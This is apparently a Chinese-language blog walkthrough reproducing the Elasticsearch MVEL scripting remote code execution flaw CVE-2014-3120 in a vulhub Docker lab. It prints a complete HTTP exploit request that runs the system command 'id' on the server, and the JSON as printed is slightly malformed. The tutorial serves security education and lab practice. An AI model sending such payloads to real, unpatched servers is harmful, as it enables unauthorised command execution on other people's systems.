ElasticSearch 命令执行漏洞(CVE-2014-3120)

前言

本文内容仅为技术科普,请勿用于非法用途!

原理

这个漏洞实际上非常简单,ElasticSearch有脚本执行(scripting)的功能,可以很方便地对查询出来的数据再加工处理。ElasticSearch用的脚本引擎是MVEL,这个引擎没有做任何的防护,或者沙盒包装,所以直接可以执行任意代码。而在ElasticSearch里,默认配置是打开动态脚本功能的,因此用户可以直接通过http请求,执行任意代码。

一、环境配置

vulhub环境搭建,搭建教程如下:

1.博客链接:https://blog.csdn.net/WEARE001/article/details/124120050?spm=1001.2014.3001.5501
2.关注微信公众号【安全info】,输入【vulhub搭建教程】即可获取。
jre版本:openjdk:8-jre
elasticsearch版本:v1.1.1

二、启动docker环境

cd /CVE/vulhub-master/elasticsearch/CVE-2014-3120
docker-compose up -d

ElasticSearch 命令执行漏洞(CVE-2014-3120)_第1张图片

9200 端口已开启
访问目标(localhost)的9200,会出现Elasticsearch的信息:
ElasticSearch 命令执行漏洞(CVE-2014-3120)_第2张图片

三、漏洞利用

利用该漏洞要求Elasticsearch中有数据,所以先创建一条数据,采用Burp发送数据包:

POST /website/blog/  HTTP/1.1
Host: 192.168.91.130:9200
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:61.0) Gecko/20100101 Firefox/61.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Content-Length: 27
{
"name": "colleget"
}

返回201状态码,代表创建成功;
ElasticSearch 命令执行漏洞(CVE-2014-3120)_第3张图片

利用该漏洞的Payload如下:

POST /_search?pretty HTTP/1.1
Host: 192.168.91.130:9200
Accept: /
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 368
{
"size": 1,
"query": {
"filtered": {
"query": {
"match_all": {
}
}
}
},
"script_fields": {
"command": {
"script": "import java.io.*;new java.util.Scanner(Runtime.getRuntime().exec("id").getInputStream()).useDelimiter("\\A").next();"
}
}
}
}
}

返回结果如下:

ElasticSearch 命令执行漏洞(CVE-2014-3120)_第4张图片
更多内容分享,请关注微信公众号“安全info”

你可能感兴趣的:(渗透测试,安全,web安全,靶场环境)